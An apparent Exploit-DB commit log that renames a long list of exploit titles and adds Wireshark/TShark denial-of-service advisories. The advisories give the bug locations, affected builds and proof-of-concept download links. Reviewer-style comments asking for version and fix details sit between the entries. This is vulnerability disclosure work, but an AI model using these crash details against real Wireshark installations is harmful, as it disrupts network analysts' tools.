DB: 2016-08-03

7 new exploits

Real Server 7/8/9 - Remote Root Exploit (Windows & Linux)
Real Server 7/8/9 - Remote Root Exploit (Windows / Linux)

Apache mod_gzip (with debug_mode) <= 1.2.26.1a - Remote Exploit
Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit

BSD & Linux - umount Local Root Exploit
BSD & Linux umount - Local Root Exploit

BSD & Linux - lpr Command Local Root Exploit
BSD & Linux lpr - Local Root Exploit

Battlefield 1942 <= 1.6.19 + Vietnam 1.2 - Broadcast Client Crash
Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash

PHP 4.3.9 & phpBB 2.x - unserialize() Remote Exploit (compiled)
PHP 4.3.9 + phpBB 2.x - unserialize() Remote Exploit (Compiled)

Soldier of Fortune 2 <= 1.03 - 'cl_guid' Server Crash
Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash

Download Center Lite (DCL) <= 1.5 - Remote File Inclusion
Download Center Lite (DCL) 1.5 - Remote File Inclusion

Linux Mandrake 10.2 - cdrdao Local Root Exploit (unfixed)
cdrdao (Mandrake 10.2) - Local Root Exploit

MyBulletinBoard (MyBB) <= 1.00 RC4 - SQL Injection Exploit
MyBulletinBoard (MyBB) 1.00 RC4 - SQL Injection Exploit

e107 <= 0.617 - XSS Remote Cookie Disclosure Exploit
e107 0.617 - XSS Remote Cookie Disclosure Exploit

MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit
MyBulletinBoard (MyBB) 1.00 RC4 SQL Injection Exploit

F-Secure Internet Gatekeeper for Linux < 2.15.484 - Local Root Exploit
F-Secure Internet Gatekeeper for Linux < 2.15.484 (and Gateway < 2.16) - Local Root Exploit

MyBulletinBoard (MyBB) <= 1.03 - Multiple SQL Injection Exploit
MyBulletinBoard (MyBB) 1.03 - Multiple SQL Injection Exploit

MyBulletinBoard (MyBB) <= 1.03 - (misc.php COMMA) SQL Injection
MyBulletinBoard (MyBB) 1.03 - (misc.php COMMA) SQL Injection

MyBulletinBoard (MyBB) <= 1.04 - (misc.php COMMA) SQL Injection (2)
MyBulletinBoard (MyBB) 1.04 - (misc.php COMMA) SQL Injection (2)

Content-Builder (CMS) <= 0.7.2 - Multiple Include Vulnerabilities
Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities

MyBulletinBoard (MyBB) <= 1.1.3 - (usercp.php) Create Admin Exploit
MyBulletinBoard (MyBB) 1.1.3 - (usercp.php) Create Admin Exploit

DZCP (deV!L_z Clanportal) <= 1.34 - (id) SQL Injection Exploit
DZCP (deV!L_z Clanportal) 1.34 - (id) SQL Injection Exploit

Invision Power Board 2.1 <= 2.1.6 - SQL Injection Exploit
Invision Power Board 2.1 <= 2.1.6 - SQL Injection Exploit (1)

MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit
MyBulletinBoard (MyBB) 1.1.5 - (CLIENT-IP) SQL Injection Exploit

PHP Live! <= 3.2.1 - (help.php) Remote Inclusion
PHP Live! 3.2.1 - (help.php) Remote Inclusion

Les Visiteurs (Visitors) <= 2.0 - (config.inc.php) File Include
Les Visiteurs (Visitors) 2.0 - (config.inc.php) File Include

Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include
Electronic Engineering Tool (EE TOOL) 0.4.1 File Include

DZCP (deV!L_z Clanportal) <= 1.3.6 - Arbitrary File Upload
DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload

Tucows Client Code Suite (CSS) <= 1.2.1015 File Include
Tucows Client Code Suite (CSS) 1.2.1015 File Include

KDE 3.5 - (libkhtml) <= 4.2.0 / Unhandled HTML Parse Exception Exploit
KDE 3.5 - (libkhtml) 4.2.0 / Unhandled HTML Parse Exception Exploit

DZCP (deV!L_z Clanportal) <= 1.4.5 - Remote File Disclosure
DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure

McAfee VirusScan for Mac (Virex) <= 7.7 - Local Root Exploit
McAfee VirusScan for Mac (Virex) 7.7 - Local Root Exploit

WEBO (Web Organizer) <= 1.0 - (baseDir) Remote File Inclusion
WEBO (Web Organizer) 1.0 - (baseDir) Remote File Inclusion

Net Portal Dynamic System (NPDS) <= 5.10 - Remote Code Execution
Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution

Katalog Plyt Audio (pl) <= 1.0 - SQL Injection Exploit
Katalog Plyt Audio (pl) 1.0 - SQL Injection Exploit

study planner (studiewijzer) <= 0.15 - Remote File Inclusion
study planner (studiewijzer) 0.15 - Remote File Inclusion

MyBulletinBoard (MyBB) <= 1.2.3 - Remote Code Execution Exploit
MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution Exploit

MyBulletinBoard (MyBB) <= 1.2.2 - (CLIENT-IP) SQL Injection Exploit
MyBulletinBoard (MyBB) 1.2.2 - (CLIENT-IP) SQL Injection Exploit

MyBulletinBoard (MyBB) <= 1.2.5 calendar.php Blind SQL Injection Exploit
MyBulletinBoard (MyBB) 1.2.5 calendar.php Blind SQL Injection Exploit

Net Portal Dynamic System (NPDS) <= 5.10 - Remote Code Execution (2)
Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)

LAN Management System (LMS) <= 1.9.6 - Remote File Inclusion Exploit
LAN Management System (LMS) 1.9.6 - Remote File Inclusion Exploit

Ripe Website Manager (CMS) <= 0.8.9 - Remote File Inclusion
Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion

Simple PHP Blog (sphpblog) <= 0.5.1 - Multiple Vulnerabilities
Simple PHP Blog (sphpblog) 0.5.1 - Multiple Vulnerabilities

TaskFreak! <= 0.6.1 - SQL Injection
TaskFreak! 0.6.1 - SQL Injection

MyBulletinBoard (MyBB) <= 1.2.10 - Remote Code Execution Exploit
mybulletinboard (mybb) <= 1.2.10 - Multiple Vulnerabilities
MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution Exploit
mybulletinboard (mybb) 1.2.10 - Multiple Vulnerabilities

MyBulletinBoard (MyBB) <= 1.2.11 - private.php SQL Injection Exploit
MyBulletinBoard (MyBB) 1.2.11 - private.php SQL Injection Exploit

PHP Live! <= 3.2.2 - (questid) SQL Injection (1)
PHP Live! 3.2.2 - (questid) SQL Injection (1)

Web Group Communication Center (WGCC) <= 1.0.3 - SQL Injection
Web Group Communication Center (WGCC) 1.0.3 - SQL Injection

C6 Messenger ActiveX Remote Download & Execute Exploit
C6 Messenger ActiveX - Remote Download & Execute Exploit

eLineStudio Site Composer (ESC) <= 2.6 - Multiple Vulnerabilities
eLineStudio Site Composer (ESC) 2.6 - Multiple Vulnerabilities

Simple PHP Blog (SPHPBlog) <= 0.5.1 Code Execution Exploit
Simple PHP Blog (SPHPBlog) 0.5.1 Code Execution Exploit

MyBulletinBoard (MyBB) <= 1.2.11 - private.php SQL Injection Exploit (2)
MyBulletinBoard (MyBB) 1.2.11 - private.php SQL Injection Exploit (2)

DZCP (deV!L_z Clanportal) <= 1.4.9.6 - Blind SQL Injection Exploit
DZCP (deV!L_z Clanportal) 1.4.9.6 - Blind SQL Injection Exploit

Amaya Web Editor XML and HTML parser Vulnerabilities
Amaya Web Editor - XML and HTML parser Vulnerabilities

CMS WEBjump! Multiple SQL Injection
CMS WEBjump! - Multiple SQL Injection

RQms (Rash) <= 1.2.2 - Multiple SQL Injection
RQms (Rash) 1.2.2 - Multiple SQL Injection

Online Grades & Attendance 3.2.6 Credentials Changer SQL Exploit
Online Grades & Attendance 3.2.6 - Credentials Changer SQL Exploit

Apple Safari & Quicktime Denial of Service
Apple Safari & Quicktime - Denial of Service

AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (SEH)
AudioPLUS 2.00.215 - (.lst / .m3u) Local Buffer Overflow (SEH)

PHP Live! <= 3.2.2 - (questid) SQL Injection (2)
PHP Live! 3.2.2 - (questid) SQL Injection (2)

TwonkyMedia Server 4.4.17 & <= 5.0.65 - XSS
TwonkyMedia Server 4.4.17 / 5.0.65 - XSS

Adobe Shockwave 11.5.1.601 Player Multiple Code Execution
Adobe Shockwave 11.5.1.601 Player - Multiple Code Execution

NAS Uploader 1.0 & 1.5 - Remote File Upload
NAS Uploader 1.0 / 1.5 - Remote File Upload

PlayMeNow 7.3 & 7.4 - Buffer Overflow (Metasploit)
PlayMeNow 7.3 / 7.4 - Buffer Overflow (Metasploit)

Nuked KLan 1.7.7 & <= SP4 DoS
Nuked KLan 1.7.7 & SP4 DoS

Aqua Real 1.0 & 2.0 - Local Crash PoC
Aqua Real 1.0 / 2.0 - Local Crash PoC

FreePBX 2.5.x < 2.6.0 - Permanent Cross-Site Scripting (XSS)
FreePBX 2.5.x < 2.6.0 - Permanent Cross-Site Scripting

Ipswitch IMAIL 11.01 reversible encryption + weak ACL
Ipswitch IMAIL 11.01 - reversible encryption + weak ACL

justVisual 2.0 - (index.php) <= LFI
justVisual 2.0 - (index.php) LFI

Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC
Simple Machines Forum (SMF) 1.1.8 - (avatar) Remote PHP File Execute PoC

SafeSHOP 1.5.6 - Cross-Site Scripting & Multiple Cross-Site Request Forgery
SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery

McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting (XSS)
McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting

Local Glibc shared library (.so) <= 2.11.1 Exploit
Local Glibc shared library (.so) 2.11.1 Exploit

Safari 4.0.3 & 4.0.4 - Stack Exhaustion
Safari 4.0.3 / 4.0.4 - Stack Exhaustion

Apache Axis2 administration console - Cross-Site Scripting (XSS) (Authenticated)
Apache Axis2 administration console - (Authenticated) Cross-Site Scripting

CubeCart PHP (shipkey parameter) <= 4.3.x - SQL Injection
CubeCart PHP (shipkey parameter) 4.3.x - SQL Injection

Joomla Health & Fitness Stats Persistent XSS
Joomla Health & Fitness Stats - Persistent XSS

PunBB 1.3.4 & Pun_PM 1.2.6 - Remote Blind SQL Injection Exploit
PunBB 1.3.4 / Pun_PM 1.2.6 - Remote Blind SQL Injection Exploit

MyIT CRM - Multiple Cross-Site Scripting (XSS)
MyIT CRM - Multiple Cross-Site Scripting

Adobe Dreamweaver CS5 <= 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)
Adobe Dreamweaver CS5 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)

Avast! <= 5.0.594 - license files DLL Hijacking Exploit (mfc90loc.dll)
Avast! 5.0.594 - (mfc90loc.dll) License Files DLL Hijacking Exploit

BlogBird Platform Multiple XSS Vulnerabilities
BlogBird Platform - Multiple XSS Vulnerabilities

Joomla Component (btg_oglas) HTML & XSS Injection
Joomla Component (btg_oglas) - HTML / XSS Injection

Lotus CMS Fraise 3.0 - LFI & Remote Code Execution Exploit
Lotus CMS Fraise 3.0 - LFI / Remote Code Execution Exploit

Novell ZenWorks 10 & 11 - TFTPD Remote Code Execution
Novell ZenWorks 10 / 11 - TFTPD Remote Code Execution

CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (1)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (1)

CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (2)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (2)

CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (3)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (3)

CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow
CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflow

SmarterMail 7.3 & 7.4 - Multiple Vulnerabilities
SmarterMail 7.3 / 7.4 - Multiple Vulnerabilities

OpenSLP 1.2.1 & < 1647 trunk - Denial of Service Exploit
OpenSLP 1.2.1 / < 1647 trunk - Denial of Service Exploit

ScadaTEC ModbusTagServer & ScadaPhone (.zip) Buffer Overflow Exploit (0Day)
ScadaTEC ModbusTagServer & ScadaPhone - (.zip) Buffer Overflow Exploit (0Day)

MARINET CMS (room.php) <= Blind SQL
MARINET CMS (room.php) Blind SQL

phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection (Metasploit)
phpMyAdmin 3.3.x / 3.4.x - Local File Inclusion via XXE Injection (Metasploit)

ContaoCMS (aka TYPOlight) <= 2.11 - CSRF (Delete Admin & Delete Article)
ContaoCMS (aka TYPOlight) 2.11 - CSRF (Delete Admin / Delete Article)

Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 - Remote Buffer Overflow
Ricoh DC Software DL-10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow

Simple PHP Agenda 2.2.8 - CSRF (Add Admin & Add Event)
Simple PHP Agenda 2.2.8 - CSRF (Add Admin / Add Event)

SumatraPDF 2.0.1 - (.chm) & (.mobi) Memory Corruption
SumatraPDF 2.0.1 - (.chm / .mobi) Memory Corruption

Dolibarr ERP & CRM 3 Post-Auth OS Command Injection
Dolibarr ERP & CRM OS Command Injection
Dolibarr ERP & CRM 3 - Post-Auth OS Command Injection
Dolibarr ERP & CRM - OS Command Injection

Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS (1)
Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS (2)
Microsoft Data Access Components (MDAC) 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS (1)
Microsoft Data Access Components (MDAC) 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS (2)

sflog! <= 1.00 - Multiple Vulnerabilities
sflog! 1.00 - Multiple Vulnerabilities

Inter7 vpopmail (vchkpw) <= 3.4.11 - Buffer Overflow
Inter7 vpopmail (vchkpw) 3.4.11 - Buffer Overflow

White Label CMS 1.5 - CSRF & Persistent XSS
White Label CMS 1.5 - CSRF / Persistent XSS

AIX 3.x/4.x & Windows 95/98/2000/NT 4 & SunOS 5 gethostbyname() - Buffer Overflow
AIX 3.x/4.x / Windows 95/98/2000/NT 4 / SunOS 5 gethostbyname() - Buffer Overflow

gdb (GNU debugger) <= 7.5.1NULL Pointer Dereference
gdb (GNU debugger) 7.5.1NULL Pointer Dereference

Adam Webb NukeJokes 1.7/2.0 Module Multiple Parameter XSS
Adam Webb NukeJokes 1.7/2.0 - Module Multiple Parameter XSS

Polycom HDX Telnet Authorization Bypass (Metasploit)
Polycom HDX - Telnet Authorization Bypass (Metasploit)

Joomla! <= 3.0.2 - (highlight.php) PHP Object Injection
Joomla! 3.0.2 - (highlight.php) PHP Object Injection

Joomla! <= 3.0.3 (remember.php) - PHP Object Injection
Joomla! 3.0.3 (remember.php) - PHP Object Injection

Active Auction House Default.ASP Multiple SQL Injection
Active Auction House - Default.ASP Multiple SQL Injection

Aenovo Multiple Unspecified Cross-Site Scripting Vulnerabilities
Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities

Alisveristr E-commerce Login Multiple SQL Injection
Alisveristr E-commerce Login - Multiple SQL Injection

Cline Communications Multiple SQL Injection
Cline Communications - Multiple SQL Injection

Andy Mack 35mm Slide Gallery 6.0 popup.php Multiple Parameter XSS
Andy Mack 35mm Slide Gallery 6.0 - popup.php Multiple Parameter XSS

Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow
Apple Safari 6.0.1 for iOS 6.0 / OS X 10.7/8 - Heap Buffer Overflow

AIOCP 1.3.x cp_forum_view.php Multiple Parameter XSS
AIOCP 1.3.x - cp_forum_view.php Multiple Parameter XSS

AIOCP 1.3.x cp_news.php Multiple Parameter SQL Injection
AIOCP 1.3.x - cp_news.php Multiple Parameter SQL Injection

AIOCP 1.3.x cp_newsletter.php Multiple Parameter SQL Injection
AIOCP 1.3.x cp_links.php Multiple Parameter SQL Injection
AIOCP 1.3.x - cp_newsletter.php Multiple Parameter SQL Injection
AIOCP 1.3.x - cp_links.php Multiple Parameter SQL Injection

AIOCP 1.3.x cp_show_ec_products.php Multiple Parameter SQL Injection
AIOCP 1.3.x - cp_show_ec_products.php Multiple Parameter SQL Injection

20/20 Applications Data Shed 1.0 listings.asp Multiple Parameter SQL Injection
20/20 Applications Data Shed 1.0 - listings.asp Multiple Parameter SQL Injection

ClickContact Default.ASP Multiple SQL Injection
ClickContact - Default.ASP Multiple SQL Injection

Onpub CMS 1.4 & 1.5 - Multiple SQL Injection
Onpub CMS 1.4 / 1.5 - Multiple SQL Injection

Apache + PHP < 5.3.12 & < 5.4.2 - cgi-bin Remote Code Execution Exploit
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution Exploit

Apache + PHP < 5.3.12 & < 5.4.2 - Remote Code Execution (Multithreaded Scanner)
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner)

ClientExec 3.0 Index.php Multiple Cross-Site Scripting Vulnerabilities
ClientExec 3.0 - Index.php Multiple Cross-Site Scripting Vulnerabilities

AbleDesign MyCalendar 2.20.3 Index.php Multiple Cross-Site Scripting Vulnerabilities
AbleDesign MyCalendar 2.20.3 - Index.php Multiple Cross-Site Scripting Vulnerabilities

AlstraSoft Affiliate Network Pro 8.0 merchants/index.php Multiple Parameter XSS
AlstraSoft Affiliate Network Pro 8.0 - merchants/index.php Multiple Parameter XSS

File(1) <= 4.13 Command File_PrintF Integer Underflow
File(1) 4.13 Command File_PrintF Integer Underflow

ACDSee 9.0 Photo Manager Multiple BMP Denial of Service Vulnerabilities
ACDSee 9.0 Photo Manager - Multiple BMP Denial of Service Vulnerabilities

Ahhp Portal Page.php Multiple Remote File Inclusion
Ahhp Portal - Page.php Multiple Remote File Inclusion

Apple QuickTime 7.1.5 Information Disclosure and Multiple Code Execution Vulnerabilities
Apple QuickTime 7.1.5 - Information Disclosure / Multiple Code Execution Vulnerabilities

OpenBase 10.0.x - (Buffer Overflow & Remote Command Execution) Multiple Vulnerabilities
OpenBase 10.0.x - Buffer Overflow / Remote Command Execution

AIDA Web Frame.HTML Multiple Unauthorized Access Vulnerabilities
AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities

Absolute News Manager .NET 5.1 xlaabsolutenm.aspx Multiple Parameter SQL Injection
Absolute News Manager .NET 5.1 - xlaabsolutenm.aspx Multiple Parameter SQL Injection

Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution and Security Vulnerabilities
Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities

Apple iPhone and iPod Touch < 2.0 - Multiple Remote Vulnerabilities
Apple iPhone / Apple iPod Touch < 2.0 - Multiple Remote Vulnerabilities

HPSystem Management Homepage (SMH) <= 2.1.12 - 'message.php' Cross-Site Scripting
HPSystem Management Homepage (SMH) 2.1.12 - 'message.php' Cross-Site Scripting

Apple iPhone 1.1.4/2.0 and iPod 1.1.4/2.0 touch Safari WebKit 'alert()' Function Remote Denial of Service
Apple iPhone 1.1.4/2.0 and iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Function Remote Denial of Service

3Com Wireless 8760 Dual-Radio 11a/b/g PoE Multiple Security Vulnerabilities
3Com Wireless 8760 Dual-Radio 11a/b/g PoE - Multiple Security Vulnerabilities

AlmondSoft Multiple Classifieds Products index.php replid Parameter SQL Injection
AlmondSoft Multiple Classifieds Products index.php Multiple Parameter XSS
AlmondSoft Multiple Classifieds Products - index.php replid Parameter SQL Injection
AlmondSoft Multiple Classifieds Products - index.php Multiple Parameter XSS

Linux Kernel 2.6.x (2.6.0 <= 2.6.31) - 'pipe.c' Local Privilege Escalation (1)
Linux Kernel 2.6.0 <= 2.6.31 - 'pipe.c' Local Privilege Escalation (1)

CMS Source Multiple Input Validation Vulnerabilities
CMS Source - Multiple Input Validation Vulnerabilities

123 Flash Chat = Multiple Security Vulnerabilities
123 Flash Chat - Multiple Security Vulnerabilities

Pimcore 3.0 & 2.3.0 CMS - SQL Injection
Pimcore 3.0 / 2.3.0 CMS - SQL Injection

Apple Mac OS X 10.6.5 And iOS 4.3.3 Mail Denial of Service
Apple Mac OS X 10.6.5 / iOS 4.3.3 Mail - Denial of Service

CmyDocument Multiple Cross-Site Scripting Vulnerabilities
CmyDocument - Multiple Cross-Site Scripting Vulnerabilities

OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)
OTRS < 3.1.x / < 3.2.x / < 3.3.x - Stored Cross-Site Scripting

OYO File Manager 1.1 (iOS & Android) - Multiple Vulnerabilities
OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities

Airdroid iOS_ Android & Win 3.1.3 - Persistent
Airdroid iOS / Android / Win 3.1.3 - Persistent

SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit
SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit

Air Drive Plus Multiple Input Vallidation Vulnerabilities
Air Drive Plus - Multiple Input Vallidation Vulnerabilities

Collabtive Multiple Security Vulnerabilities
Collabtive - Multiple Security Vulnerabilities

Open Upload 0.4.2 - (Add Admin) CSRF
Wireshark 1.12.0 to 1.12.12 - NDS Dissector Denial of Service
Wireshark 2.0.0 to 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service
Wireshark 2.0.0 to 2.0.4 - CORBA IDL Dissectors Denial of Service
Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - PacketBB Dissector Denial of Service
Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - WSP Dissector Denial of Service
Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - RLC Dissector Denial of Service
parent 1b40ae09d7
commit 75085bf1d7
8 changed files with 460 additions and 154 deletions
platforms/multiple/dos/40194.txt
Executable file
@@ -0,0 +1,31 @@
Sample generated with AFL

Build Information:
TShark 1.12.9 (v1.12.9-0-gfadb421 from (HEAD)

Copyright 1998-2015 Gerald Combs <gerald@wireshark.org> and contributors.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Compiled (64-bit) with GLib 2.48.1, with libpcap, with libz 1.2.8, with POSIX
capabilities (Linux), with libnl 3, without SMI, with c-ares 1.11.0, without
Lua, without Python, with GnuTLS 3.4.13, with Gcrypt 1.7.1, with MIT Kerberos,
with GeoIP.

Running on Linux 4.6.2-1-ARCH, with locale en_US.utf8, with libpcap version
1.7.4, with libz 1.2.8.
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz

Built using clang 4.2.1 Compatible Clang 3.8.0 (tags/RELEASE_380/final).
--
This issue was uncovered with AFL (http://lcamtuf.coredump.cx/afl/)

There is a bug in dissect_nds_request located in epan/dissectors/packet-ncp2222.inc.

dissect_nds_request attempts to call ptvcursor_free() near packet-ncp2222.inc:11806 using the variable ptvc that is set to null at the start of dissect_nds_request. Using the attached sample, the only place ptvc could be set (~ncp2222.inc:11618) is never executed and thus ptvc remains a null pointer.

Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://samate.nist.gov


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40194.zip
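Review bot: the affected and fixed versions are not stated anywhere in this file; the build banner shows only TShark 1.12.9, and the body pins the bug site (ptvcursor_free() on a ptvc that is still NULL at packet-ncp2222.inc:11806 because the assignment near :11618 is never reached) without saying which releases reproduce it or which release fixes it. Add a line next to "Credit goes to" with the versions actually tested and the upstream fix reference, and say what the attached sample contains (which frame reaches dissect_nds_request), so the entry can still be verified against a fixed build if the zip link goes stale.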
platforms/multiple/dos/40195.txt
Executable file
@@ -0,0 +1,25 @@
Build Information:
TShark (Wireshark) 2.0.2 (SVN Rev Unknown from unknown)

Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with libz 1.2.8, with GLib 2.48.0, with SMI 0.4.8, with c-ares 1.10.0, with Lua
5.2, with GnuTLS 3.4.10, with Gcrypt 1.6.5, with MIT Kerberos, with GeoIP.

Running on Linux 4.4.0-22-generic, with locale en_GB.UTF-8, with libpcap version
1.7.4, with libz 1.2.8, with GnuTLS 3.4.10, with Gcrypt 1.6.5.
Intel Core Processor (Haswell) (with SSE4.2)

Built using gcc 5.3.1 20160407.

--
Fuzzed PCAP eats large amounts of memory ( >4GB ) with a single UDP packet on tshark 2.0.2 and a recent build from repository


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40195.zip
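Review bot: the body never identifies the dissector that allocates the memory; "Fuzzed PCAP eats large amounts of memory ( >4GB ) with a single UDP packet" names no protocol, function, source file or upstream bug, and "a recent build from repository" carries no commit hash (40199.txt in the same commit cites one). The commit message lists the remaining new Wireshark entries as MMSE/WAP/WBXML/WSP and CORBA IDL dissectors, and nothing in this file says which applies. Add the dissector name, the source location, the commit tested and the bug reference, plus a credit line as the other entries have; without them a reader cannot confirm that a fixed build no longer reproduces the memory exhaustion.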
platforms/multiple/dos/40197.txt
Executable file
@@ -0,0 +1,32 @@
Sample generated by AFL

Build Information:
TShark 1.12.9 (v1.12.9-0-gfadb421 from (HEAD)

Copyright 1998-2015 Gerald Combs <gerald@wireshark.org> and contributors.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Compiled (64-bit) with GLib 2.48.1, with libpcap, with libz 1.2.8, with POSIX
capabilities (Linux), with libnl 3, without SMI, with c-ares 1.11.0, without
Lua, without Python, with GnuTLS 3.4.13, with Gcrypt 1.7.1, with MIT Kerberos,
with GeoIP.

Running on Linux 4.6.2-1-ARCH, with locale en_US.utf8, with libpcap version
1.7.4, with libz 1.2.8.
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz
--
This issue was uncovered with AFL (http://lcamtuf.coredump.cx/afl/)

The attached sample evokes a divide-by-zero error in the dissect_pbb_tlvblock() function at packet-packetbb.c:289.

The variable of interest seems to be 'c' which is set at packet-packetbb.c:285 using two other variables and an addition. When c is zero, the expression "length/c" at packet-packetbb.c:289 results in a divide-by-zero error.

Divide-by-zero has been observed when sample is parsed by tshark versions 1.12.8, 1.12.9, 1.12.10, 1.12.12, and 2.0.4 among others.

Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://samate.nist.gov


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40197.zip
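Review bot: the description of the zero divisor is too vague to check against a fix: 'c' is said to be set at packet-packetbb.c:285 "using two other variables and an addition" without naming either, so a reader cannot tell which packet fields the sample zeroes. Name the two operands (or quote line 285) and state what the fix must contain, a c == 0 check before "length/c" at :289; as written, the integer division by zero raises SIGFPE on the x86-64 Linux builds listed in the banner and terminates tshark, which is the denial of service the title claims. The "among others" in the observed-versions line should be replaced with the full list actually tested.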
platforms/multiple/dos/40198.txt
Executable file
@@ -0,0 +1,32 @@
Sample generated with AFL

Build Information:
TShark (Wireshark) 2.0.4

Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with libz 1.2.8, with GLib 2.48.1, without SMI, with c-ares 1.11.0, with Lua
5.2, with GnuTLS 3.4.13, with Gcrypt 1.7.1, with MIT Kerberos, with GeoIP.

Running on Linux 4.6.3-1-ARCH, with locale en_US.utf8, with libpcap version
1.7.4, with libz 1.2.8, with GnuTLS 3.4.13, with Gcrypt 1.7.1.
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz (with SSE4.2)

Built using gcc 6.1.1 20160602.
--
This issue was uncovered with AFL (http://lcamtuf.coredump.cx/afl/)

This infinite loop is caused by an offset of 0 being returned by wkh_content_disposition(). This offset of 0 prevents the while loop using "offset < tvb_len" from returning and results in an infinite loop.

This issue has been observed in both tshark 1.12.x and 2.0.x.

Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://samate.nist.gov


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40198.zip
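Review bot: no source file or line is given for the bug; the body names wkh_content_disposition() and the "offset < tvb_len" loop but not the dissector file, so nothing in the entry ties it to the WSP dissector named in its title or lets a reader locate the loop, unlike 40194.txt and 40197.txt which cite file:line. Add the file:line of the while loop and of the call that returns offset 0, and replace "1.12.x and 2.0.x" with the releases actually reproduced (the banner shows 2.0.4). The fix to look for is a progress check in that loop: treat a returned offset that does not advance past the previous one as malformed and break, rather than re-entering the loop body with the same offset.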
platforms/multiple/dos/40199.txt
Executable file
@@ -0,0 +1,87 @@
Sample PCAP

Build Information:
TShark (Wireshark) 2.0.2 (SVN Rev Unknown from unknown)

Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
